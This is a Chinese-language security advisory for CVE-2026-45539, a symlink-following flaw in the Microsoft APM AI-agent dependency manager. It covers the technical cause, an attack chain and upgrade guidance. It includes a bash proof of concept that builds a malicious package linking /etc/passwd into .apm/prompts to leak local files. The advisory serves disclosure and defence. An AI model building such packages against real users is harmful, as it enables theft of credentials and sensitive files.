IPBUF安全漏洞报告
English
CVE-2026-45539 CVSS 7.4 高危

CVE-2026-45539 Microsoft APM 符号链接跟随漏洞

披露日期: 2026-05-15
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-45539
漏洞类型
符号链接跟随
CVSS评分
7.4 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Microsoft APM

相关标签

符号链接Microsoft APM信息泄露CVSS-7.4任意文件读取

漏洞概述

Microsoft APM 是一款开源的 AI 代理依赖管理器。在 0.5.4 至 0.12.4 版本中,其 apm-cli 组件存在符号链接跟随漏洞。攻击者可构造包含恶意符号链接的远程依赖包,当受害者克隆并集成该包时,APM 会自动解析符号链接,将攻击者指定的本地文件(如敏感配置)内容写入项目的部署目录。由于该过程绕过了现有安全扫描且文件可能被提交至 Git,导致敏感信息泄露风险。

技术细节

该漏洞源于 Microsoft APM 在枚举和读取包文件时使用了会跟随符号链接的 API(Path.glob 和 Path.read_text)。具体利用过程为:攻击者在恶意仓库的特定路径(.apm/prompts/ 或 .apm/agents/)下创建指向受害者敏感文件的符号链接。受害者依赖该仓库时,符号链接被原样下载。当 APM 执行集成操作时,它解引用该链接,读取目标文件内容并将其作为普通文件写入部署目录。由于部署目录默认未被 .gitignore 排除,且 content_hash 和安全扫描机制未针对此行为进行检测,导致敏感数据极易被泄露。

攻击链分析

STEP 1
1. 制作恶意包
攻击者创建一个恶意的 APM 依赖包,并在 .apm/prompts 或 .apm/agents 目录下放置指向敏感文件(如 /etc/passwd 或 SSH 密钥)的符号链接。
STEP 2
2. 诱导受害者依赖
攻击者将此恶意包发布到公共仓库或诱导受害者在项目中添加该远程依赖。
STEP 3
3. 执行克隆与集成
受害者使用 Microsoft APM 克隆项目并执行集成操作。APM 在处理文件时,通过 Path.read_text() 解析了恶意符号链接。
STEP 4
4. 文件写入与泄露
符号链接指向的本地敏感文件内容被读取并写入到项目的 deploy 目录中。由于该目录未被 gitignore,敏感文件可能被自动提交到代码仓库,造成信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/bin/bash # PoC for CVE-2026-45539: Microsoft APM Symlink Vulnerability # This script simulates creating a malicious APM package. MALICIOUS_DIR="malicious_apm_package" TARGET_FILE="/etc/passwd" # Target file to steal on the victim's machine # Create the directory structure required by APM mkdir -p "$MALICIOUS_DIR/.apm/prompts" # Create a symbolic link inside the prompts directory # This link will be followed by the vulnerable APM client ln -s "$TARGET_FILE" "$MALICIOUS_DIR/.apm/prompts/leak.prompt.md" # Initialize a git repo to simulate remote dependency cd "$MALICIOUS_DIR" git init git add -A git commit -m "PoC: Malicious package with symlink for CVE-2026-45539" echo "[+] Malicious package created at: $(pwd)" echo "[+] If a victim integrates this package using vulnerable Microsoft APM," echo "[+] the content of $TARGET_FILE will be written to their deploy directory."

影响范围

Microsoft APM >= 0.5.4, <= 0.12.4

防御指南

临时缓解措施
建议用户立即将 Microsoft APM 升级至 0.13.0 或更高版本,该版本已修复符号链接处理逻辑。在无法立即升级的情况下,应严格审查来源不明的 APM 依赖包,并在集成前手动检查 .apm 目录中是否存在符号链接。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表